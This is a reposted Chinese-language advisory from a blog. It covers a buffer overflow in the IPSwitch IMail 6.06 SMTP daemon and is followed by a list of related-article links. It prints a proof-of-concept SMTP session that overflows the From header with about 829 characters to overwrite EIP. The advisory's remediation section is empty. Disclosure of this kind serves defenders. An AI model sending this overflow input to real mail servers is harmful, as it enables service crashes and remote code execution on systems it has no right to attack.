IMail SMTP 緩衝區溢位漏洞 (APP,缺陷) (轉)
I SMTP 緩衝區 (APP,缺陷)
涉及:
SMTP daemon
描述:
IMail SMTP 緩衝區溢位導致者程式碼漏洞
詳細:
IPSwitch IMail 是一個流行的電子伺服器,透過 介面為客戶提供郵件服務。並且 IMail 與大多數常見的電子郵
件相容,例如:SMTP, POP3, IMAP4, 等。今天發現它存在緩衝區溢位漏洞。問題在於 IMail SMTP 守護程式在處
理輸入資料時沒有進行正確的邊界檢查。攻擊者利用這點能使 IMail SMTP 伺服器發生緩衝區溢位從而執行攻擊者提
供的程式碼。
以下程式碼僅僅用來測試和研究這個漏洞,如果您將其用於不正當的途徑請後果自負
為了重寫 EIP,必須知道有效的郵件列表名(附:讀者可向 索取郵件列表名,內容寫“list" 即
可)。將郵件列表名放入下列 SMTP 請求中,將能成功導致 IMail 服務緩衝區溢位。
Client SMTP Session -> IMAIL SMTP
----------------------------------------------------
helo eeyerulez
mailfrom: <>
rcpt to: valid_mailing_list
data
From: [buffer] example.
To: Whatever
wohooo!
.
quit
-----------------------------------------------------
Where [buffer] is 829 or so characters.
受影響:
IPSwitch's IMail 6.06 SMTP daemon
解決方案:
CNNS 建議您立即:
[ul] [/ul]
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10752043/viewspace-989511/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 緩衝區溢位漏洞那些事:C -gets函式函式
- 緩衝區溢位漏洞的原理及其利用實戰
- 一個緩衝區溢位漏洞的簡易教程
- 緩衝區溢位實驗
- 緩衝區溢位小程式分析
- 駭客中級技術--緩衝區溢位攻擊(轉)
- Redis緩衝區溢位及解決方案Redis
- CVE-2010-2883-CoolType.dll緩衝區溢位漏洞分析
- pwntools緩衝區溢位與棧沒對齊
- MikroTik RouterOS 中發現了可遠端利用的緩衝區溢位漏洞ROS
- 淺談C#緩衝區溢位的祕密C#
- CVE-2011-0104 Microsoft Office Excel緩衝區溢位漏洞 分析ROSExcel
- MS15-002 telnet服務緩衝區溢位漏洞分析與POC構造
- CVE 2015-0235: GNU glibc gethostbyname 緩衝區溢位漏洞
- 緩衝區溢位攻擊初學者手冊(更新版)
- Python經典棧緩衝區溢位獲取root許可權Python
- CMD.EXE中dir超長字串緩衝區溢位原理學習字串
- cve-2010-3333 Microsoft Office Open XML檔案格式轉換器棧緩衝區溢位漏洞 分析ROSXML
- 快取區溢位漏洞工具Doona快取
- CVE-2010-2883Adobe Reader和Acrobat CoolType.dll棧緩衝區溢位漏洞分析BAT
- Linux核心即時入侵檢測安全增強-防止緩衝區溢位的核心補丁(轉)Linux
- ASLR 是如何保護 Linux 系統免受緩衝區溢位攻擊的Linux
- 緩衝區分析
- C 標準庫IO緩衝區和核心緩衝區的區別
- Java NIO:緩衝區Java
- getchar緩衝區
- 解決呼叫DBMS_OUTPUT時出現緩衝器溢位的錯誤
- 調節Oracle資料緩衝區引數,緩衝整個資料庫(轉)Oracle資料庫
- perl格式串處理整數溢位漏洞(轉)
- 網路安全(超級詳細)零基礎帶你一步一步走進緩衝區溢位漏洞和shellcode編寫!
- Java NIO 之緩衝區Java
- Unity深度緩衝區指令Unity
- Java整數緩衝區Java
- nginx 緩衝區構造Nginx
- stdio流緩衝區
- YoungzsoftCMailServer遠端棧溢位漏洞AIServer
- Oracle資料庫緩衝區命中率(轉)Oracle資料庫
- [二進位制漏洞]棧(Stack)溢位漏洞 Linux篇Linux